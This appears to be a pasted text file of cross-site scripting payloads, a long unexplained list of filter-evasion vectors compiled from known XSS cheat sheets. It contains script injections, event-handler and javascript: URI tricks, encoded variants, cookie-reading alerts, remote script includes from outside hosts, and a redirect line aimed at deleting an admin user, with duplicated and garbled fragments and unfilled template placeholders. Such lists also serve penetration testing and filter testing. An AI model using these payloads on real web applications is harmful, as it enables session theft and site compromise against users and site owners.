xsspylod.txt
alyasyo (alyas jhon)
Actions

Authored By

	alyasyo
	Mon, Feb 9, 4:35 PM

Size

118 KB

Referenced Files

None

Subscribers

None

xsspylod.txt
View Options

	<html>
	<head>
	<meta charset="UTF-8" />
	</head>
	<body>

	"-prompt(8)-"
	'-prompt(8)-'
	";a=prompt,a()//
	';a=prompt,a()//
	'-eval("window['pro'%2B'mpt'](8)")-'
	"-eval("window['pro'%2B'mpt'](8)")-"
	"onclick=prompt(8)>"@x.y
	"onclick=prompt(8)>"@x.y






	t>
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	'`"><\x3Cscript>javascript:alert(1)
	'`"><\x00script>javascript:alert(1)

































































	\x3Cscript>javascript:alert(1)
	'"`>


	--> -->
	-->
	-->
	-->
	`"'><p></p>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>







	"'`>ABC DEF
	"'`>ABC DEF
	%253Cscript%253Ealert('XSS')%253C%252Fscript%253E



	'`"><\x3Cscript>javascript:alert(1)
	'`"><\x00script>javascript:alert(1)
	"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
	"'`><\x00img src=xxx:x onerror=javascript:alert(1)>




	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"/>
	"/>
	"/>
	"/>
	"/>
	"/>
	"/>
	"/>
	"/>
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>




	<b>alert(1)0





	">
	">
	">
	">

	<% foo>



































	<a rel="nofollow noopener" target="_blank">XXX</a>



	<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
	<!--[if]><script>javascript:alert(1)</script -->
	<!--[if<img src=x onerror=javascript:alert(1)//]> -->
	<script src="/\%(jscript)s"></script>
	<script src="\\%(jscript)s"></script>
	<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
	<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
	<style>p[foo=bar{}{-o-link:'javascript:javascript:alert(1)'}{}{-o-link-source:current}]{color:red};</style>
	<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
	<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
	<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
	<style>*[{}@import'%(css)s?]</style>X
	<div style="font-family:'foo
	;color:red;';">XXX
	<div style="font-family:foo}color=red;">XXX
	<// style=x:expression\28javascript:alert(1)\29>
	<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>
	<div style=content:url(%(svg)s)></div>
	<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
	<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
	<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
	<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
	<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
	<x style="background:url('x;color:red;/*')">XXX</x>
	<script>({set//$($){_//setter=$,_=javascript:alert(1)}}).$=eval</script>
	<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
	<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
	<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
	<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
	<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
	<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
	X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
	1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
	1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
	<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
	1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
	<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
	<x style="behavior:url(%(sct)s)">
	<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
	<event-source src="%(event)s" onload="javascript:alert(1)">
	<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
	<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">
	<script>%(payload)s</script>
	<script src=%(jscript)s></script>
	<script language='javascript' src='%(jscript)s'></script>
	<script>javascript:alert(1)</script>
	<IMG SRC="javascript:javascript:alert(1);">
	<IMG SRC=javascript:javascript:alert(1)>
	<IMG SRC=`javascript:javascript:alert(1)`>
	<SCRIPT SRC=%(jscript)s?<B>
	<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
	<BODY ONLOAD=javascript:alert(1)>
	<BODY ONLOAD=javascript:javascript:alert(1)>
	<IMG SRC="jav ascript:javascript:alert(1);">
	<BODY onload!#$%%&()*~+-_.,:;?@[/\|\]^`=javascript:alert(1)>
	<SCRIPT/SRC="%(jscript)s"></SCRIPT>
	<<SCRIPT>%(payload)s//<</SCRIPT>
	<IMG SRC="javascript:javascript:alert(1)"
	<iframe src=%(scriptlet)s <
	<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
	<IMG DYNSRC="javascript:javascript:alert(1)">
	<IMG LOWSRC="javascript:javascript:alert(1)">
	<BGSOUND SRC="javascript:javascript:alert(1);">
	<BR SIZE="&{javascript:alert(1)}">
	<LAYER SRC="%(scriptlet)s"></LAYER>
	<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
	<STYLE>@import'%(css)s';</STYLE>
	<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
	<XSS STYLE="behavior: url(%(htc)s);">
	<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
	<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
	<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
	<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
	<TABLE BACKGROUND="javascript:javascript:alert(1)">
	<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
	<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
	<DIV STYLE="width:expression(javascript:alert(1));">
	<IMG STYLE="xss:expr/XSS/ession(javascript:alert(1))">
	<XSS STYLE="xss:expression(javascript:alert(1))">
	<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
	<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
	<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
	<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
	<BASE HREF="javascript:javascript:alert(1);//">
	<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
	<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
	<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
	<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
	<SCRIPT SRC="%(jpg)s"></SCRIPT>
	<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
	<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
	<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
	<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
	<STYLE>@import'%(css)s';</STYLE>
	<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
	<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
	<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
	<style onreadystatechange=javascript:javascript:alert(1);></style>
	<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
	<embed code=%(scriptlet)s></embed>
	<embed code=javascript:javascript:alert(1);></embed>
	<embed src=%(jscript)s></embed>
	<frameset onload=javascript:javascript:alert(1)></frameset>
	<object onerror=javascript:javascript:alert(1)>
	<embed type="image" src=%(scriptlet)s></embed>
	<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
	<IMG SRC=&{javascript:alert(1);};>
	<a href="javAascript:javascript:alert(1)">test1</a>
	<a href="javaascript:javascript:alert(1)">test1</a>
	<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
	<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">
	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
	alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
	></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=JaVaScRiPt:alert('XSS')>
	<IMG SRC=javascript:alert("XSS")>
	<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
	<a onmouseover="alert(document.cookie)">xxs link</a>
	<a onmouseover=alert(document.cookie)>xxs link</a>
	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
	<IMG SRC=# onmouseover="alert('xxs')">
	<IMG SRC= onmouseover="alert('xxs')">
	<IMG onmouseover="alert('xxs')">
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC="jav ascript:alert('XSS');">
	<IMG SRC="jav ascript:alert('XSS');">
	<IMG SRC="jav
	ascript:alert('XSS');">
	<IMG SRC="jav ascript:alert('XSS');">
	perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
	<IMG SRC=" javascript:alert('XSS');">
	<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
	<BODY onload!#$%&()*~+-_.,:;?@[/\|\]^`=alert("XSS")>
	<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
	<<SCRIPT>alert("XSS");//<</SCRIPT>
	<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
	<SCRIPT SRC=//ha.ckers.org/.j>
	<IMG SRC="javascript:alert('XSS')"
	<iframe src=http://ha.ckers.org/scriptlet.html <
	\";alert('XSS');//





	<ul><li>XSS<br>




	<br>







	exp/*<a rel="nofollow noopener" target="_blank">

	</a><a class="XSS" rel="nofollow noopener" target="_blank"></a>




	¼script¾alert(¢XSS¢)¼/script¾

















	alert("XSS")'); ?>
	Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

	+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-






	PT SRC="http://ha.ckers.org/xss.js">
	<a href="http://66.102.7.147/" rel="nofollow noopener" target="_blank">XSS</a>
	<a href="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D" rel="nofollow noopener" target="_blank">XSS</a>
	<a href="http://1113982867/" rel="nofollow noopener" target="_blank">XSS</a>
	<a href="http://0x42.0x0000066.0x7.0x93/" rel="nofollow noopener" target="_blank">XSS</a>
	<a href="http://0102.0146.0007.00000223/" rel="nofollow noopener" target="_blank">XSS</a>
	<a rel="nofollow noopener" target="_blank">XSS</a>

	<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
	<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
	<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
	<img/src=`%00` onerror=this.onerror=confirm(1)
	<form><isindex formaction="javascript&colon;confirm(1)"
	<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
	<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
	<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
	<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
	<script /%00/>/%00/alert(1)/%00/</script /%00/
	&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
	<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
	<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
	<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
	<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
	<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
	<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
	<form><a href="javascript:\u0061lert&#x28;1&#x29;">X
	</script><img/%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00/onerror='eval(src)'>
	<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
	<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
	<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
	http://www.google<script .com>alert(document.location)</script
	<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
	<img/src=@&#32;&#13; onerror = prompt('&#49;')
	<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
	<script ^__^>alert(String.fromCharCode(49))</script ^__^
	</style &#32;><script &#32; :-(>//alert(document.location)//</script &#32; :-(
	&#00;</form><input type&#61;"date" onfocus="alert(1)">
	<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
	<script /*/>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script /*/
	<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
	<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
	<script ~~~>alert(0%0)</script ~~~>
	<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
	<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
	<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
	&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
	&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
	<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
	<div/style="width:expression(confirm(1))">X</div> {IE7}
	<iframe/%00/ src=javaSCRIPT&colon;alert(1)
	//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
	/iframe/src/<iframe/src="<iframe/src=@"/onload=prompt(1) /iframe/src/>
	//\|\\ <script //\|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //\|\\ </script //\|\\
	</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
	<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
	</plaintext\></\|\><plaintext/onmouseover=prompt(1)
	</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
	<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
	<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
	<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
	<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
	<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
	<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
	<var onmouseover="prompt(1)">On Mouse Over</var>
	<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
	<img src="/" =_=" title="onerror='prompt(1)'">
	<%<!--'%><script>alert(1);</script -->
	<script src="data:text/javascript,alert(1)"></script>
	<iframe/src \/\/onload = prompt(1)
	<iframe/onreadystatechange=alert(1)
	<svg/onload=alert(1)
	<input value=<><iframe/src=javascript:confirm(1)
	<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
	http://www.<script>alert(1)</script .com
	<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29>



	<a xlink:href="//jsfiddle.net/t846h/" rel="nofollow noopener" target="_blank">click
	</a>




	--!>

	x
	">
	CLICKME
	<a xlink:href="//jsfiddle.net/t846h/" rel="nofollow noopener" target="_blank">click


	<a rel="nofollow noopener" target="_blank">Click Me</a>
	‘; alert(1);
	‘)alert(1);//

	</a>





	<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
	<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
	<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
	<img/src=`%00` onerror=this.onerror=confirm(1)
	<form><isindex formaction="javascript&colon;confirm(1)"
	<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
	<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
	<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
	<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
	<script /%00/>/%00/alert(1)/%00/</script /%00/
	&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
	<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
	<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
	<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
	<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
	<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
	<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
	<form><a href="javascript:\u0061lert&#x28;1&#x29;">X
	</script><img/%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00/onerror='eval(src)'>
	<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
	<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
	<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
	http://www.google<script .com>alert(document.location)</script
	<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
	<img/src=@&#32;&#13; onerror = prompt('&#49;')
	<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
	<script ^__^>alert(String.fromCharCode(49))</script ^__^
	</style &#32;><script &#32; :-(>//alert(document.location)//</script &#32; :-(
	&#00;</form><input type&#61;"date" onfocus="alert(1)">
	<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
	<script /*/>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script /*/
	<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
	<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
	<script ~~~>alert(0%0)</script ~~~>
	<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
	<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
	<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
	&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
